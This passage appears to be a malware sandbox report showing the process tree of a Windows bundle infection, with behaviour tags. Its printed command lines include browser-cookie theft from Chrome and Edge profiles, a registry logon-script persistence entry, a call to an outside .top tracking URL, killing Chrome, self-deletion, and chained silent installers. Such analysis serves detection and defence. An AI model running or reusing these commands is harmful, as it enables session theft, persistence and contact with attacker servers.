C:\Users\Admin\AppData\Roaming\7300426.exe"C:\Users\Admin\AppData\Roaming\7300426.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1996 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:4716
-
-
-
C:\Users\Admin\AppData\Roaming\2310645.exe"C:\Users\Admin\AppData\Roaming\2310645.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
-
C:\Users\Admin\Documents\oYJ4oarMVlCEKSuYDbZ6GPPw.exe"C:\Users\Admin\Documents\oYJ4oarMVlCEKSuYDbZ6GPPw.exe"2⤵
- Executes dropped EXE
PID:4028 -
C:\Users\Admin\Documents\oYJ4oarMVlCEKSuYDbZ6GPPw.exe"C:\Users\Admin\Documents\oYJ4oarMVlCEKSuYDbZ6GPPw.exe"3⤵
- Modifies data under HKEY_USERS
PID:8236
-
-
-
C:\Users\Admin\Documents\Ls6HCRy7CjYIm6XRO_DMyU5M.exe"C:\Users\Admin\Documents\Ls6HCRy7CjYIm6XRO_DMyU5M.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:508 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 7603⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5000
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 7843⤵
- Program crash
PID:3260
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 8203⤵
- Program crash
PID:4080
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 8563⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 9563⤵
- Program crash
PID:5176
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 9843⤵
- Program crash
PID:5484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 10203⤵
- Program crash
PID:5756
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 14563⤵
- Program crash
PID:5940
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 14963⤵
- Program crash
PID:5208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 15003⤵
- Program crash
PID:6116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 16883⤵
- Program crash
PID:6136
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 14883⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6064
-
-
-
C:\Users\Admin\Documents\MWJd3mPPIlWyLa2RpIzVqQrH.exe"C:\Users\Admin\Documents\MWJd3mPPIlWyLa2RpIzVqQrH.exe"2⤵
- Executes dropped EXE
PID:4492
-
-
C:\Users\Admin\Documents\5vpgJBjyfbnbMk1YeKUgbWC8.exe"C:\Users\Admin\Documents\5vpgJBjyfbnbMk1YeKUgbWC8.exe"2⤵
- Executes dropped EXE
PID:4612 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 6603⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 7163⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 6643⤵
- Program crash
PID:4544
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 6683⤵
- Program crash
PID:2032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 11603⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4212
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 11203⤵
- Program crash
PID:992
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 11123⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
-
-
C:\Users\Admin\Documents\Xdb1fFnJhrYC1plDJxt3VPoy.exe"C:\Users\Admin\Documents\Xdb1fFnJhrYC1plDJxt3VPoy.exe"2⤵
- Executes dropped EXE
PID:4948
-
-
C:\Users\Admin\Documents\yY2qmC4iOLBQc_v9oIAFRu3F.exe"C:\Users\Admin\Documents\yY2qmC4iOLBQc_v9oIAFRu3F.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4672 -
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:4832 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:3180
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5912
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2704
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2520
-
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
PID:4512 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:2188
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:6016
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5524
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5356
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4512 -s 15364⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:1220
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:5040
-
-
-
C:\Users\Admin\Documents\8md1vxAwe7Y0ndRiBYaafLjk.exe"C:\Users\Admin\Documents\8md1vxAwe7Y0ndRiBYaafLjk.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:492
-
-
C:\Users\Admin\Documents\DvMwGNgUky7bXWwCd2_zhu5C.exe"C:\Users\Admin\Documents\DvMwGNgUky7bXWwCd2_zhu5C.exe"2⤵
- Executes dropped EXE
PID:184 -
C:\Users\Admin\AppData\Local\Temp\is-6BVRA.tmp\DvMwGNgUky7bXWwCd2_zhu5C.tmp"C:\Users\Admin\AppData\Local\Temp\is-6BVRA.tmp\DvMwGNgUky7bXWwCd2_zhu5C.tmp" /SL5="$40266,138429,56832,C:\Users\Admin\Documents\DvMwGNgUky7bXWwCd2_zhu5C.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4372 -
C:\Users\Admin\AppData\Local\Temp\is-33Q2P.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-33Q2P.tmp\Setup.exe" /Verysilent4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4444 -
C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"5⤵
- Executes dropped EXE
PID:5884 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 7526⤵
- Program crash
PID:6060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 7766⤵
- Program crash
PID:5964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 8006⤵
- Program crash
PID:7144
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵
- Executes dropped EXE
PID:5952 -
C:\Users\Admin\AppData\Local\Temp\is-2P2NR.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-2P2NR.tmp\Inlog.tmp" /SL5="$20254,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5280 -
C:\Users\Admin\AppData\Local\Temp\is-LRHL3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-LRHL3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵PID:7400
-
C:\Users\Admin\AppData\Local\Temp\is-8GTL4.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-8GTL4.tmp\Setup.tmp" /SL5="$4028A,17369807,721408,C:\Users\Admin\AppData\Local\Temp\is-LRHL3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:7664 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵PID:5556
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵
- Drops file in Windows directory
PID:7108
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵PID:3508
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵PID:3800
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=7219⤵
- Checks computer location settings
PID:1176
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵
- Loads dropped DLL
PID:8416
-
-
C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\vdi_compiler"9⤵PID:660
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\vdi_compiler.exe"10⤵PID:2884
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 411⤵
- Runs ping.exe
PID:8292
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵
- Executes dropped EXE
PID:6068 -
C:\Users\Admin\AppData\Local\Temp\is-6A3OQ.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-6A3OQ.tmp\WEATHER Manager.tmp" /SL5="$401DE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5540 -
C:\Users\Admin\AppData\Local\Temp\is-5TLP3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-5TLP3.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:7324 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-5TLP3.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-5TLP3.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289462 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵PID:8524
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵
- Executes dropped EXE
PID:6108 -
C:\Users\Admin\AppData\Local\Temp\is-U04EQ.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-U04EQ.tmp\VPN.tmp" /SL5="$20256,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5616 -
C:\Users\Admin\AppData\Local\Temp\is-1O307.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-1O307.tmp\Setup.exe" /silent /subid=7207⤵PID:7972
-
C:\Users\Admin\AppData\Local\Temp\is-BQEBS.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-BQEBS.tmp\Setup.tmp" /SL5="$30288,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-1O307.tmp\Setup.exe" /silent /subid=7208⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:8052 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "9⤵PID:8392
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090110⤵
- Checks SCSI registry key(s)
PID:8436
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "9⤵PID:8864
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090110⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:7732
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall9⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3416
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install9⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2184
-
-
C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:5192
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵
- Executes dropped EXE
PID:5360 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:6836
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:6916
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵
- Executes dropped EXE
PID:5560 -
C:\Users\Admin\AppData\Roaming\5918109.exe"C:\Users\Admin\AppData\Roaming\5918109.exe"6⤵
- Executes dropped EXE
PID:5020
-
-
C:\Users\Admin\AppData\Roaming\4164647.exe"C:\Users\Admin\AppData\Roaming\4164647.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:5744
-
-
C:\Users\Admin\AppData\Roaming\4417789.exe"C:\Users\Admin\AppData\Roaming\4417789.exe"6⤵
- Executes dropped EXE
PID:6320
-
-
C:\Users\Admin\AppData\Roaming\4278010.exe"C:\Users\Admin\AppData\Roaming\4278010.exe"6⤵
- Executes dropped EXE
PID:6240
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵PID:5636
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵
- Executes dropped EXE
PID:4520
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵PID:5420
-
C:\Users\Admin\AppData\Local\Temp\is-UEE73.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-UEE73.tmp\MediaBurner2.tmp" /SL5="$1030E,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5032 -
C:\Users\Admin\AppData\Local\Temp\is-RG9UP.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-RG9UP.tmp\3377047_logo_media.exe" /S /UID=burnerch27⤵PID:6276
-
C:\Program Files\MSBuild\XECLZJAKZJ\ultramediaburner.exe"C:\Program Files\MSBuild\XECLZJAKZJ\ultramediaburner.exe" /VERYSILENT8⤵PID:6208
-
C:\Users\Admin\AppData\Local\Temp\is-4QFNF.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-4QFNF.tmp\ultramediaburner.tmp" /SL5="$30294,281924,62464,C:\Program Files\MSBuild\XECLZJAKZJ\ultramediaburner.exe" /VERYSILENT9⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:7852 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:7916
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7e-dd116-ba9-f80ac-43521baecbf98\Gaemataeshani.exe"C:\Users\Admin\AppData\Local\Temp\7e-dd116-ba9-f80ac-43521baecbf98\Gaemataeshani.exe"8⤵
- Checks computer location settings
PID:772
-
-
C:\Users\Admin\AppData\Local\Temp\e8-c9bea-ea6-ed5b1-d27f02c38b513\Miruxatabu.exe"C:\Users\Admin\AppData\Local\Temp\e8-c9bea-ea6-ed5b1-d27f02c38b513\Miruxatabu.exe"8⤵PID:3504
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bu1exqmo.2tv\GcleanerEU.exe /eufive & exit9⤵PID:6836
-
C:\Users\Admin\AppData\Local\Temp\bu1exqmo.2tv\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\bu1exqmo.2tv\GcleanerEU.exe /eufive10⤵PID:8200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j0cdybvr.fey\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:8460
-
C:\Users\Admin\AppData\Local\Temp\j0cdybvr.fey\installer.exeC:\Users\Admin\AppData\Local\Temp\j0cdybvr.fey\installer.exe /qn CAMPAIGN="654"10⤵PID:8924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zqxe0sbg.plp\ufgaa.exe & exit9⤵PID:8780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe & exit9⤵PID:8320
-
C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exeC:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4544 -
C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe"C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe" -q11⤵PID:8600
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3vbsshvs.egm\gcleaner.exe /mixfive & exit9⤵PID:8968
-
C:\Users\Admin\AppData\Local\Temp\3vbsshvs.egm\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\3vbsshvs.egm\gcleaner.exe /mixfive10⤵PID:8172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3di1wj4c.u5s\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
PID:8892
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:6008 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289462 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵PID:6668
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"5⤵
- Executes dropped EXE
PID:5684 -
C:\Users\Admin\AppData\Local\Temp\tmpDB29_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpDB29_tmp.exe"6⤵PID:7152
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"7⤵PID:7636
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks7⤵PID:4900
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:6256
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks9⤵PID:6096
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i9⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5936 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5580 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2776 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵PID:6312
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵
- Suspicious use of SendNotifyMessage
PID:7352 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵
- Suspicious use of SendNotifyMessage
PID:8224 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵
- Suspicious use of SendNotifyMessage
PID:8896 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵
- Suspicious use of SendNotifyMessage
PID:8288 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵
- Suspicious use of SendNotifyMessage
PID:8256 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵PID:7520
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵
- Suspicious use of SendNotifyMessage
PID:8380 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵
- Suspicious use of SendNotifyMessage
PID:8668 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵PID:6452
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵
- Suspicious use of SendNotifyMessage
PID:7888 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵PID:8544
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵
- Suspicious use of SendNotifyMessage
PID:7900 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵
- Suspicious use of SendNotifyMessage
PID:8012 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵PID:4264
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious use of SendNotifyMessage
PID:7764 -
